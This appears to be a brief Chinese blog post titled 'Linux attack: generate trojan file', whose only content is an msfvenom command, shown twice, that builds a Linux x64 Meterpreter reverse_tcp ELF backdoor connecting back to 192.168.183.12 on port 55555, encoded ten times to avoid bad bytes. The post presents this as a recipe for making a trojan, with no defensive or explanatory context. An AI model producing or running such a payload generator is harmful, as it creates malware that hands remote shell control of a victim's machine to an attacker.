Linux攻击
生成木马文件
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 -b '\x00' -i 10 -f elf -o yu_demo_two
msfvenom生成木马-Linux Wondows
阅读 93
2022-02-12
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 -b '\x00' -i 10 -f elf -o yu_demo_two
相关推荐
精彩评论(0)